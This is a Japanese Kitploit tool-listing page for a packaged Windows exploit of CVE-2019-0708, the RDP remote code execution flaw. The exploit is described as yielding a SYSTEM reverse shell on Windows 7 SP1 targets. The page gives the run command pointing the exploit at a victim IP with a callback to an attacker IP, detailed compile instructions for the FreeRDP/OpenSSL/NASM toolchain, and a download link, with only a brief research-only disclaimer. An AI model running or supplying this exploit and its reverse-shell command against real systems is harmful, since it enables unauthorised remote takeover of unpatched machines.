Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2019-0708-EXP-Windows — CVE-2019-0708-EXP-Windows版単ファイルexe版、実行後直接現在のコンソールでSystem権限のリバースシェルを取得する。 | Kitploit
ツール/GitHubGitHub/cbwang505/cve-2019-0708-exp-windows
ペイロード生成脆弱性分析エクスプロイトシェルコードペネトレーションテストリモートアクセスツール
GitHubcbwang505/cve-2019-0708-exp-windows

CVE-2019-0708-EXP-Windows

CVE-2019-0708-EXP-Windows版単ファイルexe版、実行後直接現在のコンソールでSystem権限のリバースシェルを取得する。

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見るウェブサイト
31768226年前Kitploit レビュー済み

CVE-2019-0708-EXP-Windows-Version

お断り

著者のPOCは研究目的のみです。読者が本POCを他の目的に使用した場合、著者は一切の責任を負いません。

目次

[toc]

紹介

CVE-2019-0708-EXP-Windows版は単一ファイルのexeとして動作し、Linux、Python、Ruby等は不要です。実行後、現在のコンソールに直接System権限のシェルが起動します。

コンパイルは全静的ライブラリモードを採用し、すべてのDLLをインライン化、netcatとopensslを統合、プログレスバー表示とシェルのエコー操作をサポートします。

再現環境

  1. 被害者OS : Windows 7 sp1 x64
  2. 攻撃者OS : Windows 10 x64
  3. コンパイル環境 : Visual Studio 2013

使用方法

  1. CVE-2019-0708-EXP-Release ディレクトリに移動します
  2. wfreerdp.exe /v:Victim_IP /l:Attacker_IP を実行します(例: wfreerdp.exe /v:10.120.1.160 /l:10.120.1.17)

インストール手順

  1. FreeRDP-master プロジェクトを E:\git\KernelResearch\FreeRDP-master\ にコピーします
  2. OpenSSL コンパイル環境をインストールするか、openssl.7z を C:\openssl\ に直接展開して、コンパイル済みの OpenSSL 環境を使用します
  3. Nasm コンパイル環境をインストールします
  4. 管理者として cmake-3.15.3-win64-x64.msi をインストールします
  5. C:\Program Files\CMake\bin を PATH 環境変数に追加します
  6. コンピュータを再起動します
  7. "C:\Program Files\CMake\bin\cmake.exe" E:\git\KernelResearch\FreeRDP-master\CMakeCache.txt を実行します
  8. プロジェクトをコンパイルします。ファイルが不足している場合は、FreeRDP-master-restore.7z から復元できます
OpenSSL コンパイル環境のインストール手順
  1. openssl-1.0.2s.tar.gz を C:\openssl\ に展開します
  2. ActivePerl-5.28.1.0000-MSWin32-x64-fde9aa8a.msi をインストールします
  3. C:\Perl64\bin を PATH 環境変数に追加します
  4. VS2013 x64 ネイティブツールコマンドプロンプトを開きます(スタートメニューから)
  5. perl Configure VC-WIN64A を実行します
  6. cd /d C:\openssl\ を実行します
  7. ms\do_win64a を実行します
  8. 次にコンパイルを開始します。以下のモードが使用できます(EXP では静的ライブラリモードを採用):
    • OpenSSL 動的ライブラリのコンパイル:nmake -f ms\ntdll.mak
    • OpenSSL 静的ライブラリのコンパイル:nmake -f ms\nt.mak
    • OpenSSL 動的ライブラリのテスト:nmake -f ms\ntdll.mak test
    • OpenSSL 静的ライブラリのテスト:nmake -f ms\nt.mak test
    • OpenSSL 動的ライブラリのインストール:nmake -f ms\ntdll.mak install
    • OpenSSL 静的ライブラリのインストール:nmake -f ms\nt.mak install
    • 前回の OpenSSL 動的ライブラリのコンパイルをクリアして再コンパイル:nmake -f ms\ntdll.mak clean
    • 前回の OpenSSL 静的ライブラリのコンパイルをクリアして再コンパイル:nmake -f ms\nt.mak clean
  9. 完了後、out32 ディレクトリから libeay32.lib と ssleay32.lib ファイルを C:\openssl\lib\ にコピーします
Nasm コンパイル環境のインストール手順
  1. 管理者として nasm-2.14.02-installer-x64.exe をインストールします
  2. C:\Program Files\NASM を PATH 環境変数に追加します
  3. nasmBuildCustomizations.rar を展開し、3つのファイルを C:\Program Files (x86)\MSBuild\Microsoft.Cpp\v4.0\V120\BuildCustomizations\ にコピーします
  4. client->common->freerdp-client プロジェクトを右クリック →「ビルドの依存関係」→「ビルドのカスタマイズ」を選択し、nasm にチェックを入れます(masm ではありません)
  5. freerdp-client プロジェクト内の任意の *.asm ファイルを選択し、右クリックメニューにコンパイルオプションが表示されれば、Nasm コンパイル環境のインストール成功です

実行結果

クリックして拡大表示

プロジェクトホスティング

私のPOCアドレス

貢献

著者は ZheJiang Guoli Security Technology、メール:[email protected]

ツールをダウンロード